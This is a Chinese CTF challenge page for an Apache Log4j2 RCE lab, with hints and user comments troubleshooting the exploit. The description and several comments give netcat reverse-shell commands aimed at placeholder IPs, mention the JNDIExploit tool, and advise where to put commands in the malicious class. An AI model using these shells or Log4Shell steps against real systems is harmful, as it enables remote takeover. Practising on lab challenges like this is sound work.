Apache Log4j2 RCEWEB 未解决

分数: 25 金币: 3
题目作者: 云牧青
一  血: yeedo
一血奖励: 8金币
解  决: 549
提  示: 人太多了服务器性能有点满了,启动不起来的 过一会再启动就可以了。
描  述:
/bin/bash:x ; /bin/sh √ ; /dev/tcp × ; nc -e x ; nc a.cc 1234 -e √ ;
...
登录回复
评论
haoge 4年前
举报

nb,这就上了??

回复 0
VVeaker 4年前
举报

服务器直接裂开

回复 0
xiaohui 4年前
举报

搞了一天半都还没复现

回复 0
bob1994 4年前
举报

nc -e /bin/sh X.X.X.X 12345 弹不回shell??

回复 3
dididizi 4年前
举报

@wufeng java -jar JNDIExploit-1.2-SNAPSHOT.jar -i IP --illegal-access=warn_________这个意思?

回复 0
云牧青 4年前
举报

@bob1994 nc X.X.X.X 1234 -e /bin/sh,类没问题吧,执行命令放在构造函数或者静态代码块里,还要处理异常

回复 0
bob1994 4年前
举报

@云牧青 能收到ldap请求和http请求.class文件,但就是弹不回shell

回复 1
美式加糖 4年前
举报

shell弹不出来啊,成功的老哥能把恶意类分享一下吗?我看看我的有没有出错

回复 0
xiangxw 4年前
举报

@云牧青 这样。谢谢

回复 0
云牧青 4年前
举报

@xiangxw docker镜像是alpine,它的nc就是这样,只能放后面,不然报错...

回复 0
JNsnow 4年前
举报

@wufeng 加一,刚复现,也是这个问题

回复 0
wufeng 4年前
举报

我这边也是,ping命令都行,反弹就不行,卡了一天。。。现在似乎找到问题了,好像是我vps上的java版本问题,java命令后面跟上--illegal-access=warn就好了,不行的老哥可以试试。

回复 1
xiangxw 4年前
举报

@云牧青 为什么要放后面

回复 0
云牧青 4年前
举报

@bob1994 nc没毛病,-e在后面可以的。排查一下,首先确定你有没有收到rmi/ldap请求,再确定有没有收到http请求.class文件。实在不行下载源码本地搭建看看

回复 0
bob1994 4年前
举报

@harry nc X.X.X.X 12345 -e /bin/sh 好像还是不行

回复 0
18634648362 4年前
举报

@harry 我也试了好多反弹shell命令 弹不回来

回复 0
harry 管理员 4年前
举报

-e放后面试试

回复 1
ZianTT 4年前
举报

同问?

回复 0
ReStr1 4年前
举报

怎么变成小游戏了

回复 0
小列兵 4年前
举报

这么快,强的离谱

回复 0
harry 管理员 4年前
举报

人太多了 ,xdm 过一会再启动吧

回复 1
R1ch029 4年前
举报

牛啊

回复 0
bob1994 4年前
举报

启动错误?

回复 0
harry 管理员 4年前
举报

人太多了 题目服务器性能有点不够 建议等一会再开启

回复 0
Anyyy 4年前
举报

神速

回复 0

WriteUp

image
18634648362

6 金币

立即查看

评分(6)

解题动态

t0ur1st 攻破了该题 1天前
geri 攻破了该题 7天前
SkyAsh 攻破了该题 8天前
她说我们只是朋友 攻破了该题 21天前
网恋秀牛子被录屏导致自卑 攻破了该题 1月前
yuuwt 攻破了该题 1月前
lucas0001 攻破了该题 1月前
左岸_left 攻破了该题 1月前
ycxlo 攻破了该题 1月前
igotyou 攻破了该题 1月前
xshzgjshpy 攻破了该题 1月前
admit 攻破了该题 1月前
1kuzus 攻破了该题 2月前
0cu1ux 攻破了该题 2月前
365days 攻破了该题 2月前
592174532 攻破了该题 2月前
blueboat 攻破了该题 2月前
kukuqi666 攻破了该题 3月前
mantou 攻破了该题 4月前
admin999 攻破了该题 4月前
问题反馈